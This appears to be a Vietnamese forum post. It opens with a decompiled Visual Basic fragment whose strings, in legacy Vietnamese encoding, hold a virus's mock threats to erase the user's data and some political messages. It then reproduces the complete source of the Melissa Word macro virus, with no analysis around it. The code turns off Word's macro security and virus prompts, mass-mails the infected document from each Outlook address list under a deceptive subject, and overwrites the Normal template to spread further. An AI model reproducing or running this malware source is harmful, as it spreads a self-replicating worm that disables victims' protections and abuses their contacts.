loc_408262: var_90(5) = "Cã ai ®ang ngåi tríc mµn h×nh vi tÝnh kh«ng, l¾ng tai nghe tao biÓu nÌ, sao m¸y tÝnh cña mµy toµn lµ r¸c kh«ng v©y, ®Ó tao xãa 1 ph¸t cho s¹ch sÏ nha... §ïa cho vui th«i, chø tao ®©u d¸m xãa cña mµy ®©u, xãa cña mµy xong mµ bÞ b¾t th× chØ cã níc ®i xÐ lÞch, tao kh«ng cã ngu ®Õn nçi lµm c¸i trß khïng ®ã ®©u"
loc_408271: var_90(6) = "HÐ he hª hÒ hÝ hi ha hµ. Khµ khµ. Lµm ¬n ®èt cho tao mét chót giÊy tiÒn vµng m· ®i, nÕu kh«ng tao sÏ ®èt hÕt d÷ liÖu cña mµy mµ xµi ®ì. £ nhí th¾p cho tao 3 c©y nhan mçi ngµy n÷a ®ã"
loc_408280: var_90(7) = "ChÊt lîng ®µo t¹o c«ng nghÖ th«ng tin còng nh c¸c nghµnh kh¸c ë c¸c trêng ®¹i häc ë viÖt nam thËt lµ kinh khñng. gi¶ng viªn d¹y cø nh chim s©u mèm måi cho vÞt. Cßn sinh viªn ®a sè cÆm côi chÐp bµi nh con bß tr©n m×nh gÆm ®èng cá kh« khã nuèt. Ngêi ta ®· lªn tíi mÆt tr¨ng tõ l©u råi, th× Ýt ra m×nh còng ph¶i tíi mÆt ®Êt. Cø sao l¹i cßn ë trong hang, mÊt mÆt qu¸"
loc_40828F: var_90(8) = "TËp ®oµn t b¶n ®á ViÖt Nam lïi 1 bíc, sau ®ã quay lng l¹i råi tiÕn 10 bíc trong vÊn ®Ò tranh chÊp chñ quyÒn quÇn ®¶o Hoµng Sa vµ Trêng Sa víi Trung Quèc. Yªu cÇu céng s¶n ViÖt Nam hñy ngay hîp ®ång b¸n ®Êt cho Trung Quèc"
loc_40829E: var_90(9) = "Th«ng b¸o t×m trÎ l¹c. Mª Ga Bai cÇn t×m ®øa em hä lµ s©u vi tÝnh Mi Xa, nã ®· bá nhµ ra ®i l©u l¾m råi, kh«ng biÕt sèng chÕt ra sao, cã ai nh×n thÊy xin vui lßng ®¨ng tin lªn m¹ng in t¬ nÐt dïm, xin nãi thªm vÒ ®¹t ®iÓm nhËn d¹ng lµ nã hay cêi vµ hay h¸t"
loc_4082AD: var_90(&HA) = ""
loc_4082BD: Erase var_90
loc_4082C1: MemVar_411024 = Array(var_90)
loc_4082CC: Exit Sub
End Sub
http://www.hvaonline.net/hvaonline/posts/list/9923.hva
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs Filename:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Subvirusvn.com đã viết:
